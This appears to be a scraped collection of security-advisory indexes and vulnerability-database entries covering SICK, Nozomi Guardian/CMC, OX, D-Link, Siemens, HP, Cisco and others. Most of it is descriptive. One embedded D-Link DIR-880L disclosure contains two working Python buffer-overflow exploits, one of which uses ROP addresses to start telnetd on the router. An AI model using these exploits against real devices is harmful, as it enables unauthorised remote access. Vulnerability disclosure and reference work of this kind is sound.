sca-2025-0009 Vulnerabilities affecting SICK TDC-E210GC 2025-08-01T13:00:00.000Z 2025-08-01T13:00:00.000Z
sca-2025-0008 Multiple vulnerabilities in Endress+Hauser MEAC300-FNADE4 2025-07-03T13:00:00.000Z 2025-07-03T13:00:00.000Z
sca-2025-0007 Multiple vulnerabilities in SICK Field Analytics and SICK Media Server 2025-06-12T13:00:00.000Z 2025-06-12T13:00:00.000Z
sca-2025-0003 FreeRTOS Vulnerabilities have no impact on SICK Products 2025-02-28T00:00:00.000Z 2025-05-20T11:00:00.000Z
sca-2025-0006 Vulnerability affecting picoScan and multiScan 2025-04-28T13:00:00.000Z 2025-04-28T13:00:00.000Z
sca-2025-0005 Vulnerabilities in SICK Flexi Compact 2025-04-28T10:00:00.000Z 2025-04-28T10:00:00.000Z
sca-2025-0004 Critical vulnerabilities in SICK DL100-2xxxxxxx 2025-03-14T11:00:00.000Z 2025-03-14T11:00:00.000Z
sca-2025-0001 Multiple vulnerabilities in SICK MEAC300 2025-02-14T14:00:00.000Z 2025-02-21T14:00:00.000Z
sca-2025-0002 Vulnerability in SICK Lector8xx and SICK InspectorP8xx 2025-02-14T10:19:00.000Z 2025-02-14T10:19:00.000Z
sca-2024-0007 Vulnerability in SICK OLM 2024-12-31T00:00:00.000Z 2024-12-31T00:00:00.000Z
sca-2024-0006 Critical vulnerabilities in SICK InspectorP61x, InspectorP62x and TiM3xx 2024-12-06T00:00:00.000Z 2024-12-06T00:00:00.000Z
sca-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
SCA-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
sca-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
SCA-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
sca-2024-0003 Critical vulnerability in multiple SICK products 2024-10-17T13:00:00.000Z 2024-10-17T13:00:00.000Z
sca-2024-0002 Vulnerability in SICK MSC800 2024-09-11T23:00:00.000Z 2024-09-11T23:00:00.000Z
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics 2024-01-29T00:00:00.000Z 2024-01-29T00:00:00.000Z
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
SCA-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
SCA-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
sca-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
SCA-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
SCA-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
sca-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
SCA-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
sca-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
SCA-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2025:3-01 Incorrect authorization for traces request/download in CMC before 25.1.0 2025-08-26T11:00:00.000Z 2025-08-26T11:00:00.000Z
nn-2025:2-01 Privilege escalation in Guardian/CMC before 24.6.0 2025-06-10T11:00:00.000Z 2025-06-10T11:00:00.000Z
nn-2025:1-01 Authenticated RCE in update functionality in Guardian/CMC before 24.6.0 2025-06-10T11:00:00.000Z 2025-06-10T11:00:00.000Z
nn-2024_2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024:1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
oxas-adv-2025-0001 OX App Suite Security Advisory OXAS-ADV-2025-0001 2025-01-27T00:00:00+01:00 2025-04-07T00:00:00+00:00
oxdc-adv-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxdc-adv-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
OXDC-ADV-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxas-adv-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
OXAS-ADV-2024-0005 OX App Suite Security Advisory OXAS-ADV-2024-0005 2024-07-08T00:00:00+02:00 2024-09-09T00:00:00+00:00
oxdc-adv-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
OXDC-ADV-2024-0001 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0001 2024-09-02T00:00:00+02:00 2024-09-06T00:00:00+00:00
oxas-adv-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0004 OX App Suite Security Advisory OXAS-ADV-2024-0004 2024-06-13T00:00:00+02:00 2024-08-19T00:00:00+00:00
OXAS-ADV-2024-0003 OX App Suite Security Advisory OXAS-ADV-2024-0003 2024-04-24T00:00:00+02:00 2024-08-19T00:00:00+00:00
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
OXAS-ADV-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 2024-03-06T00:00:00+01:00 2024-05-06T00:00:00+00:00
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
OXAS-ADV-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 2024-02-08T00:00:00+01:00 2024-04-25T00:00:00+00:00
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
OXAS-ADV-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 2023-12-11T00:00:00+01:00 2024-02-16T00:00:00+00:00
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 2023-05-02T00:00:00+02:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 2023-03-20T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2023-02-06T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2022-11-02T00:00:00+01:00 2024-01-22T00:00:00+00:00
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2022-08-10T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 2023-09-25T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 2023-09-19T00:00:00+02:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 2023-08-01T00:00:00+02:00 2024-01-22T00:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202411-1650 D-LINK DI-8400 v16.07.26A1 was discovered to contain multiple remote command execution (RCE) vulnerabilities in the msp_info_htm function via the flag and cmd parameters. D-LINK DI-8400 is a router device from D-Link, USA, used for home and small business network connections. Remote attackers can exploit this vulnerability to execute arbitrary commands
var-202411-1640 Linksys E3000 is a powerful dual-band Wireless-N router from Linksys, an American company. There is a security vulnerability in diag_ping_start of Linksys E3000. A remote attacker can use this vulnerability to submit special requests and execute arbitrary commands in the context of the application.
var-202411-0543 A vulnerability has been identified in SIMATIC S7-PLCSIM V16 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 Safety V16 (All versions), SIMATIC STEP 7 Safety V17 (All versions < V17 Update 8), SIMATIC STEP 7 Safety V18 (All versions < V18 Update 5), SIMATIC STEP 7 V16 (All versions), SIMATIC STEP 7 V17 (All versions < V17 Update 8), SIMATIC STEP 7 V18 (All versions < V18 Update 5), SIMATIC WinCC Unified V16 (All versions), SIMATIC WinCC Unified V17 (All versions < V17 Update 8), SIMATIC WinCC Unified V18 (All versions < V18 Update 5), SIMATIC WinCC V16 (All versions), SIMATIC WinCC V17 (All versions < V17 Update 8), SIMATIC WinCC V18 (All versions < V18 Update 5), SIMOCODE ES V16 (All versions), SIMOCODE ES V17 (All versions < V17 Update 8), SIMOCODE ES V18 (All versions), SIMOTION SCOUT TIA V5.4 SP1 (All versions), SIMOTION SCOUT TIA V5.4 SP3 (All versions), SIMOTION SCOUT TIA V5.5 SP1 (All versions), SINAMICS Startdrive V16 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SIRIUS Safety ES V17 (All versions < V17 Update 8), SIRIUS Safety ES V18 (All versions), SIRIUS Soft Starter ES V17 (All versions < V17 Update 8), SIRIUS Soft Starter ES V18 (All versions), TIA Portal Cloud V16 (All versions), TIA Portal Cloud V17 (All versions < V4.6.0.1), TIA Portal Cloud V18 (All versions < V4.6.1.0). Affected products do not properly sanitize user-controllable input when parsing user settings. This could allow an attacker to cause a type confusion and execute arbitrary code within the affected application. SIMATIC S7-PLCSIM simulates S7-1200, S7-1500 and some other PLC derivatives, shipped as part of SIMATIC STEP 7. SIMATIC STEP 7 (TIA Portal) is an engineering software for configuring and programming SIMATIC controllers. SIMOCODE ES is the core software package for SIMOCODE pro configuration, commissioning, operation and diagnostics.
SINAMICS Startdrive commissioning software is the engineering tool for integrating SINAMICS drives in TIA Portal. TIA Portal is a PC software that provides the full range of Siemens digital automation services from digital planning and integrated engineering to transparent operation. TIA Portal Cloud makes it possible to use the main package and main option package of TIA Portal in a virtualized environment
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. Failed exploits may result in denial-of-service conditions.
## Advisory Information
Title: DIR-880L Buffer overflows in authentication and HNAP functionalities.
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline <patrick.cline@dlink.com> (Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061. However, the vendor has now taken the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-880L -- Wireless AC1900 Dual-Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities.
first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthenticated attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run at least 200-500 times to bypass ASLR on ARM based devices.
## Details
Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in library used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
Buffer overflow in auth
----------------------------------------------------------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com).
## Details
# Ping buffer overflow
# Send email buffer overflow
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline
var-201807-0341 ABB Panel Builder 800 all versions has an improper input validation vulnerability which may allow an attacker to insert and run arbitrary code on a computer where the affected product is used. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the IpAddress parameters of the ABB BeMMS OPC Driver. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code under the context of an administrator. ABB Panel Builder 800 is a web-based HMI (Human Machine Interface) system from ABB, Switzerland. Failed exploit attempts will result in denial-of-service conditions
var-202411-1422 D-Link DI-8200 16.07.26A1 is vulnerable to remote command execution in the msp_info_htm function via the flag parameter and cmd parameter. D-Link Systems, Inc. di-8200 firmware contains a command injection vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). D-Link DI-8200 is an enterprise-class router from D-Link, a Chinese company. No detailed vulnerability details are currently available
var-202411-1539 D-LINK DI-8003 v16.07.26A1 was discovered to contain a buffer overflow via the host_ip parameter in the ipsec_road_asp function. An out-of-bounds write vulnerability exists in D-Link Systems, Inc. di-8003 firmware. Service operation may be interrupted (DoS). D-LINK DI-8003 is a router product produced by D-LINK. No detailed vulnerability details are currently provided
var-201103-0371 SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. Input passed to aa-open-inlist.jsp via the "url", "sWindow", "BEGIN_DATE", "END_DATE", "CURRENT_DATE" and "CURRENT_SLICE" parameters is not filtered before being returned to the user, which can lead to cross-site scripting attacks
var-202410-3364 In TP-Link TL-WDR7660 v1.0, the guestRuleJsonToBin function handles the parameter string name without checking it, which can lead to stack overflow vulnerabilities. TP-LINK TL-WDR7660 is a Gigabit router from TP-LINK of China. TP-LINK TL-WDR7660 version 1.0 has a buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code on the system or cause a denial of service
var-202411-1441 D-LINK DI-8003 v16.07.16A1 was discovered to contain a buffer overflow via the notify parameter in the arp_sys_asp function. An out-of-bounds write vulnerability exists in D-Link Systems, Inc. di-8003 firmware. Service operation may be interrupted (DoS). D-Link DI-8400 is a wireless router from D-Link, a Chinese company. D-Link DI-8400 arp_sys_asp has a buffer overflow vulnerability, which can be exploited by remote attackers to submit special requests, causing the service program to crash or execute arbitrary code in the context of the application
var-201112-0173 The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. A vulnerability in certain Hewlett-Packard devices could allow a remote attacker to install unauthorized firmware on an affected system. HP Printers and Digital Senders are prone to a security-bypass vulnerability. The unauthorized firmware could also cause a Denial of Service to the device. SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates.
Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. 
However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The issues are tracked as Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. A third party could execute arbitrary code via overly long parameters in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition.
---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ RELEASE DATE: 2010-11-09 DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078.
4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/
---------------------------------------------------------------------- ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.
Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-202407-0046 mySCADA myPRO uses a hard-coded password which could allow an attacker to remotely execute code on the affected device. Authentication is not required to exploit this vulnerability. The specific flaw exists within the telnet service, which listens on TCP port 5005 by default. The issue results from the use of hard-coded credentials. mySCADA myPRO is an application software. myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes
var-202410-2013 In mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Google Android contains an out-of-bounds write vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Google Pixel is a smartphone produced by Google in the United States. Google Pixel has a buffer overflow vulnerability. The vulnerability is caused by incorrect boundary checking in mm_GetMobileIdIndexForNsUpdate of mm_GmmPduCodec.c. Attackers can exploit this vulnerability to cause out-of-bounds write
